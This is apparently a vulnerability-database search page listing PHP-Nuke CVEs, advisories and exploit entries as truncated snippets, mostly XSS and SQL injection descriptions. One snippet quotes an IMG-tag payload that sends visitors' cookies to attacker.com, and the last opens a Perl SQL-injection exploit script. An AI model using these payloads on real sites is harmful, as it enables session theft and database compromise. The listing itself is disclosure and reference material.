1732 matches found
CVE-2006-0185
Php-Nuke is affected by multiple cross-site scripting in the (1) Pool and (2) News Modules, allowing remote attackers to inject arbitrary scripts via javascript in the SRC attribute of an IMG tag. The root cause is unsanitized input in image tags enabling script execution. Impact is web-page defa...
CVE-2006-0185
Multiple cross-site scripting vulnerabilities in the 1 Pool or 2 News Modules in Php-Nuke allow remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of an IMG tag...
Cross site scripting
Multiple cross-site scripting vulnerabilities in the 1 Pool or 2 News Modules in Php-Nuke allow remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of an IMG tag...
CVE-2006-0185
Multiple cross-site scripting vulnerabilities in the 1 Pool or 2 News Modules in Php-Nuke allow remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of an IMG tag...
[SA18374] PHP-Nuke News "Story Text" Script Insertion Vulnerability
TITLE: PHP-Nuke News "Story Text" Script Insertion Vulnerability SECUNIA ADVISORY ID: SA18374 VERIFY ADVISORY: http://secunia.com/advisories/18374/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: PHP-Nuke 7.x http://secunia.com/product/2385/ DESCRIPTION:...
phpnukePoolXSS.txt
NightWarrior nightwarrior771athotmail.com Php-Nuke Pool and News Module IMG Tag Cross Site Scripting Contact :nightwarrior771athotmail.com Post Coment this Code:...
Php-Nuke Pool and News Module IMG Tag Cross Site
NightWarriorKurdihs Hacker nightwarrior771athotmail.com Php-Nuke Pool and News Module IMG Tag Cross Site Scripting Contact :nightwarrior771athotmail.com Post Coment this Code: img src="javascript:window.navigate'http://attacker.com/cookies.php?c='+document.cookie;" cookies.php $cookie = $GET'c';...
PHP-Nuke 7.7 EV Search Module - SQL Injection
source: https://www.securityfocus.com/bid/16186/info PHPNuke EV is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or...
CVE-2005-4715
Multiple SQL injection vulnerabilities in modules.php in PHP-Nuke 7.8, when magicquotesgpc is disabled, allow remote attackers to execute arbitrary SQL commands via the 1 name, 2 sid, and 3 pid parameters in a POST request, which bypasses security checks that are performed for GET requests...
CVE-2005-4781
Multiple SQL injection vulnerabilities in SergiDs Top Music module 3.0 PR3 and earlier for PHP-Nuke allow remote attackers to execute arbitrary SQL commands via the 1 idartist, 2 idsong, and 3 idalbum parameters to modules.php...
CVE-2005-4260
CVE-2005-4260 is an XSS vulnerability in PHP-Nuke 7.9 and later, where an interpretation conflict in includes/mainfile.php allows remote attackers to inject scripts by replacing the ">" with "
CVE-2005-4260
Interpretation conflict in includes/mainfile.php in PHP-Nuke 7.9 and later allows remote attackers to perform cross-site scripting XSS attacks by replacing the "" in the tag with a "", which bypasses the regular expressions that sanitize the data, but is automatically corrected by many web...
bypassXSSnuke.txt
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Bypass XSS filter in PHPNUKE 7.9=x cXIb8O3.21 Author: Maksymilian Arciemowicz cXIb8O3 Date: 14.12.2005 from SECURITYREASON.COM - --- 0.Description --- PHP-Nuke is a Web Portal System, storytelling software, news system, online community or whatever yo...
PHP-Nuke 7.x - Content Filtering Bypass
source: https://www.securityfocus.com/bid/15855/info PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks. PHPNuke 7.9 and prior versions are report...
Top Music Module 3.0 - SQL Injection
Top Music Module 3.0 - SQL Injection source: https://www.securityfocus.com/bid/15581/info Top Music Module for PHP-Nuke is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query...
Top Music module for PHP Nuke SQL inj. vuln
Top Music module for PHP Nuke SQL inj. vuln Vuln. dicovered by : r0t Date: 28 nov. 2005 orginal advisory:http://pridels.blogspot.com/2005/11/top-music-module-for-php-nuke-sql-inj.html Vendor:http://www.sergids.com/ affected version:3.0 PR3 and prior Product Description: This is a module for PHPNu...
CVE-2005-3792
Multiple SQL injection vulnerabilities in the Search module in PHP-Nuke 7.8, and possibly other versions before 7.9 with patch 3.1, allows remote attackers to execute arbitrary SQL commands, as demonstrated via the query parameter in a stories type...
CVE-2005-3792
CVE-2005-3792 corresponds to SQL injection in the PHP-Nuke 7.8 Search module (and possibly earlier versions) that allows remote execution of arbitrary SQL commands via the query parameter in a stories type. Affected software is PHP-Nuke 7.8 with patch 3.1, and other versions before 7.9 may be vul...
CVE-2005-3792
Multiple SQL injection vulnerabilities in the Search module in PHP-Nuke 7.8, and possibly other versions before 7.9 with patch 3.1, allows remote attackers to execute arbitrary SQL commands, as demonstrated via the query parameter in a stories type...
PHP-Nuke <= 7.8 Search Module Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ========================================================== PHP-Nuke new Proto = "tcp", PeerAddr = "$HOST", PeerPort = "80" || die " Connect FAILED\n"; print " Connected OK\n"; print " Sending exploit OK\n\n"; print $send "POST ".$GET."...